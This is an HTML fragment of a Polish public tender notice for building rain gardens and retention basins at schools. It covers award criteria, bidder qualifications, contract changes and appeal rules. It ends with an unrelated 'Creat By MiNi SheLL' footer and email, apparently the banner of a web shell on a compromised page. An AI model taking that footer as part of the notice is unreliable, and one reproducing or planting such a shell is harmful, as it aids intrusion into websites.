Zamawiający przekaże Wykonawcy - po podpisaniu umowy - mapy zasadnicze w wersji edytowalnej dla każdej z lokalizacji. Wykonawca we własnym zakresie i na własny koszt uzyska mapy d/c projektowych dla każdej lokalizacji.<br/>6.	Zamawiający dopuszcza etapowanie inwestycji polegające na rozdzieleniu prac przy montażu elementów konstrukcyjnych gruntowych ogrodów deszczowych, niecek retencyjnych, a sadzeniem materiału roślinnego. Prace techniczne mogą być wykonane niezależnie i poza okresem wegetacji roślin. Dostarczenie do szkół roślin i narzędzi ogrodniczych na potrzeby działań edukacyjnych organizowanych przez placówki szkolne może nastąpić przed zakończeniem prac projektowych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">45112712-9 - Roboty w zakresie kształtowania ogrodów</p> <p class="mb-0">45223000-6 - Roboty budowlane w zakresie konstrukcji</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45342000-6 - Wznoszenie ogrodzeń</p> <p class="mb-0">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</p> <p class="mb-0">71247000-1 - Nadzór nad robotami budowlanymi</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">71310000-4 - Doradcze usługi inżynieryjne i budowlane</p> <p class="mb-0">71540000-5 - Usługi zarządzania budową</p> <p class="mb-0">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</p> <p class="mb-0">77300000-3 - Usługi ogrodnicze</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert i ich wagą:<br/>Kryterium	Waga [%]	Liczba punktów [pkt]<br/>Cena brutto za wykonanie zamówienia 60%	60<br/>Termin końcowy okresu gwarancji i rękojmi 40%	40<br/><br/>2.	Zasady oceny ofert w poszczególnych kryteriach:<br/>1)	kryterium „Cena brutto za wykonanie zamówienia” – waga kryterium 60%.: (PK1 )<br/>Sposób obliczenia: PK1= [CN / CR x 60% ] x 100 <br/>PK1 – ilość punktów dla kryterium <br/>CN – najniższa zaoferowana w postępowaniu całkowita cena brutto za wykonanie zamówienia, spośród ofert niepodlegających odrzuceniu<br/>CR – całkowita cena brutto za wykonanie zamówienia, zaoferowana przez Wykonawcę, który złożył ofertę rozpatrywaną <br/><br/>2)	kryterium „Termin końcowy okresu gwarancji i rękojmi” – waga kryterium 40% (PK2)<br/>Termin końcowy okresu gwarancji i rękojmi licząc od dnia odbioru końcowego zamówienia Liczba punktów [pkt]<br/>24 miesiące od dnia odbioru końcowego zamówienia 0 pkt<br/>36 miesięcy od dnia odbioru końcowego zamówienia 10 pkt<br/>48 miesięcy od dnia odbioru końcowego zamówienia	20 pkt<br/>60 miesięcy i więcej od dnia odbioru końcowego zamówienia	40 pkt.<br/><br/>Punkty zostaną przyznane w zależności od zaoferowanego przez Wykonawcę terminu końcowego okresu gwarancji i rękojmi w następujący sposób:<br/>a)	jeżeli Wykonawca zaoferuje termin końcowy okresu gwarancji i rękojmi wynoszący 24 miesięcy od dnia odbioru końcowego zamówienia – otrzyma 0 pkt;<br/>b)	jeżeli Wykonawca zaoferuje termin końcowy okresu gwarancji i rękojmi wynoszący 36 miesięcy od dnia odbioru końcowego zamówienia – otrzyma 10 pkt;<br/>c)	jeżeli Wykonawca zaoferuje termin końcowy okresu gwarancji i rękojmi wynoszący 48 miesięcy od dnia odbioru końcowego odbioru zamówienia – otrzyma 20 pkt;<br/>d)	jeżeli Wykonawca zaoferuje termin końcowy okresu gwarancji i rękojmi wynoszący 60 miesięcy od dnia podpisania protokołu końcowego odbioru zamówienia lub dłuższym – otrzyma 40 pkt;<br/>W przypadku, jeśli Wykonawca zaoferuje w ofercie termin końcowy okresu gwarancji i rękojmi wynoszący mniej aniżeli 24 miesiące – oferta podlegać będzie odrzuceniu. <br/>Wykonawca może uzyskać w tym kryterium maksymalnie 40 pkt.<br/>Szczegółowe zasady dot. gwarancji jakości i rękojmi udzielanej przez Wykonawcę zostały zawarte we wzorze stanowiącym załącznik nr 6 do niniejszej SWZ.<br/>3)	Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru:<br/><br/>P = PK1 + PK2<br/>gdzie:<br/>P – całkowita liczba punktów,<br/>PK1 – punkty uzyskane w kryterium „Cena brutto za wykonanie zamówienia”,<br/>PK2 – punkty uzyskane w kryterium „Termin końcowy okresu gwarancji i rękojmi”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin końcowy okresu gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1.1	Nie podlegają wykluczeniu na zasadach określonych w rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu. <br/>1.2	Spełniają warunki dotyczące:<br/>1)	Zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. <br/>2)	Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. <br/>3)	Sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. <br/>4)	Zdolności technicznej lub zawodowej: <br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że:<br/>A.	w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał (zakończył) co najmniej jedno zadanie polegające na realizacji robót budowlanych, obejmujących wykonanie co najmniej jednej z następujących rodzajów zielono-niebieskiej infrastruktury: zewnętrzna zielona ściana, skrzyniowy ogród deszczowy, gruntowy ogród deszczowy, niecka retencyjna lub kompostownik. <br/>2.	Jeżeli Wykonawca, na potrzeby spełnienia warunku udziału w postępowaniu, o którym mowa w ust. 1 pkt 1.2 ppkt 4) lit. A niniejszego Rozdziału, wskazuje na doświadczenie nabyte w ramach kontraktu (zamówienia/umowy) realizowanego przez wykonawców wspólnie realizujących zamówienia (np. w formie konsorcjum), Zamawiający wymaga, aby Wykonawca faktycznie wykonywał (brał udział w wykonaniu) wskazywanego zakresu prac. <br/>3.	Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej - dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>4.	Oceniając zdolność techniczną lub zawodową, Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 uPzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym Wykonawcą, który złożył odrębną ofertę albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – zgodne z wzorem stanowiącym załącznik nr 4 do SWZ;<br/>Oświadczenie o aktualności informacji zawartych we wstępnym oświadczeniu, o którym mowa w art. 125 ust. 1 uPzp złożonym wraz z ofertą, w zakresie podstaw wykluczenia wskazanych przez Zamawiającego – zgodne z wzorem stanowiącym załącznik nr 7 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, wraz z załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty - zgodny z wzorem stanowiącym załącznik nr 5 do SWZ;</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty oraz powinno stwierdzać ustanowienie pełnomocnika i być podpisane przez uprawnionych do reprezentacji przedstawicieli Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy.<br/>4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>5.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy. <br/>6.	Oferta musi być podpisana w taki sposób, by wiązała wszystkich Wykonawców występujących wspólnie. <br/>7.	Wszelka korespondencja prowadzona będzie z Wykonawcą występującym jako pełnomocnik Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zmiana Umowy może nastąpić za zgodą obu Stron wyrażoną na piśmie pod rygorem nieważności, w formie aneksu, na podstawie protokołu konieczności podpisanego przez obie Strony Umowy.<br/>2.	Zmiana postanowień niniejszej Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy może nastąpić, jeżeli zajdzie co najmniej jedna z okoliczności wskazanych w art. 455 ust. 1 pkt 1) - 4) lub art. 455 ust. 2 uPzp.<br/>3.	Stosownie do art. 455 ust. 1 pkt 1) uPzp oraz w przypadkach i na zasadach opisanych w ustępach kolejnych, Zamawiający dopuszcza możliwość zmiany postanowień niniejszej Umowy w stosunku do treści oferty Wykonawcy w następującym zakresie:<br/>1)	zmiana zakresu lub sposobu wykonania przedmiotu Umowy;<br/>2)	zmiana wysokości wynagrodzenia umownego Wykonawcy,<br/>3)	zmiana terminu realizacji Zamówienia. Przedmiotowa zmiana nastąpić może wyłącznie na uzasadniony wniosek Wykonawcy i po akceptacji zmiany przez Zamawiającego pod warunkiem, że zmiana ta nie jest przez Wykonawcę zawiniona i wynika z okoliczności, za które Wykonawca nie ponosi odpowiedzialności, a których nie można było przewidzieć na etapie składania ofert,<br/>4)	zmiana lub rezygnacja z podmiotu uczestniczącego w wykonywaniu Zamówienia, na którego zasobach polegał Wykonawca wykazując spełnianie warunków udziału w Postępowaniu.<br/>4.	Zmiana zakresu lub sposobu wykonania przedmiotu Umowy (w tym również zmiana co do rodzaju infrastruktury, którą zrealizować ma Wykonawca lub dokładnej lokalizacji danej infrastruktury) i związana z nią zmiana wysokości wynagrodzenia Wykonawcy lub terminu realizacji Zamówienia może nastąpić w następujących okolicznościach:<br/>1)	zaniechania realizacji części Zamówienia (Przedsięwzięcia), <br/>2)	wykonania przedmiotu Umowy przy zastosowaniu innych niż przewidziane SWZ technologii, materiałów lub urządzeń, z uwagi na pojawienie się na rynku nowszej generacji lub tańszych technologii, materiałów lub urządzeń (o właściwościach równorzędnych z parametrami technicznymi i właściwościami technologii, materiałów i urządzeń przewidzianych pierwotnie) pozwalających na zaoszczędzenie kosztów realizacji przedmiotu Umowy lub kosztów eksploatacji wykonanego przedmiotu Umowy, umożliwiające uzyskanie lepszej jakości robót, skrócenie czasu realizacji inwestycji lub kosztów wykonywanych prac,<br/>3)	przedłużających się, z przyczyn niezawinionych przez Wykonawcę, działań i uzgodnień organów administracji w zakresie wydania jakiejkolwiek decyzji, warunków, zezwoleń, uzgodnień, pozwoleń, opinii i certyfikatów wymaganych w związku z realizacją Zamówienia, powodujące niemożność zrealizowania Zamówienia w terminie umożliwiającym Zamawiającemu dokonanie rozliczenia udzielonego dofinansowania, zgodnie z zawartą umową o dofinansowanie;<br/>4)	zastosowanie przewidzianych w SWZ rozwiązań będzie groziło niewykonaniem lub wadliwym wykonaniem przedmiotu Umowy,<br/>5)	niedostępność na rynku materiałów, rozwiązań lub urządzeń wskazanych w SWZ spowodowana zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów, rozwiązań lub urządzeń,<br/>6)	wystąpienie odmiennych od przyjętych w SWZ warunków terenowych, geologicznych, geotechnicznych, hydrologicznych skutkujących niemożliwością zrealizowania przedmiotu Umowy wedle dotychczasowych założeń, w szczególności: istnienie niezinwentaryzowanych lub błędnie zinwentaryzowanych obiektów, w tym sieci lub instalacji, dokonanie znaleziska archeologicznego lub znaleziska w postaci niewypałów, niewybuchów, grobów, bądź wystąpienie konieczności wykonania badań archeologicznych;<br/>7)	konieczność zrealizowania przedmiotu Umowy przy zastosowaniu innych rozwiązań technicznych, technologicznych lub materiałowych niż przewidziane SWZ w sytuacji, gdyby zastosowanie przewidzianych pierwotnie rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu Umowy, w szczególności ze względu na zmiany obowiązującego prawa,<br/>8)	wystąpienie zdarzenia o charakterze siły wyższej uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej postanowieniami. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-04 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-04 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Środki ochrony prawnej określone w dziale IX uPzp przysługują Wykonawcy oraz innemu podmiotowi, jeżeli ma lub miał interes w uzyskaniu zamówienia oraz poniósł lub może ponieść szkodę w wyniku naruszenia przez Zamawiającego przepisów uPzp. <br/>2.	Środki ochrony prawnej wobec ogłoszenia wszczynającego postępowanie o udzielenie zamówienia oraz dokumentów zamówienia przysługują również organizacjom wpisanym na listę, o której mowa w art. 469 pkt 15 uPzp oraz Rzecznikowi Małych i Średnich Przedsiębiorców.<br/>3.	Odwołanie przysługuje na:<br/>1)	niezgodną z przepisami ustawy (uPzp) czynność Zamawiającego, podjętą w postępowaniu o udzielenie zamówienia, w tym na projektowane postanowienie umowy;<br/>2)	zaniechanie czynności w postępowaniu o udzielenie zamówienia, do której Zamawiający był obowiązany na podstawie ustawy (uPzp);<br/>4.	Odwołanie wnosi się do Prezesa Krajowej Izby Odwoławczej. Odwołujący przekazuje Zamawiającemu odwołanie wniesione w formie elektronicznej albo postaci elektronicznej albo kopię tego odwołania, jeżeli zostało ono wniesione w formie pisemnej, przed upływem terminu do wniesienia odwołania w taki sposób, aby mógł on zapoznać się z jego treścią przed upływem tego terminu.<br/>5.	Pisma w postępowaniu odwoławczym wnosi się w formie pisemnej albo w formie elektronicznej albo w postaci elektronicznej, z tym że odwołanie i przystąpienie do postępowania odwoławczego, wniesione w postaci elektronicznej, wymagają opatrzenia podpisem zaufanym. Pisma w formie pisemnej wnosi się za pośrednictwem operatora pocztowego, w rozumieniu ustawy z dnia 23 listopada 2012 r. - Prawo pocztowe, osobiście, za pośrednictwem posłańca, a pisma w postaci elektronicznej wnosi się przy użyciu środków komunikacji elektronicznej, w tym na adres do doręczeń elektronicznych, o którym mowa w art. 2 pkt 1 ustawy z dnia 18 listopada 2020 r. o doręczeniach elektronicznych (Dz. U. z 2022 r. poz. 569 i 1002).<br/>6.	Odwołanie wobec treści ogłoszenia lub treści dokumentów zamówienia wnosi się w terminie 5 dni od dnia zamieszczenia ogłoszenia w Biuletynie Zamówień Publicznych lub dokumentów zamówienia na stronie internetowej.<br/><br/>Zgodnie z art. 7 ust. 1 UOBN z postępowania o udzielenie zamówienia Zamawiający wyklucza Wykonawcę: <br/>1)	wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 UOBN;<br/>2)	którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 UOBN; <br/>3)	którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 UOBN. <br/>Wykluczenie następować będzie na okres trwania ww. okoliczności.

Creat By MiNi SheLL
Email: jattceo@gmail.com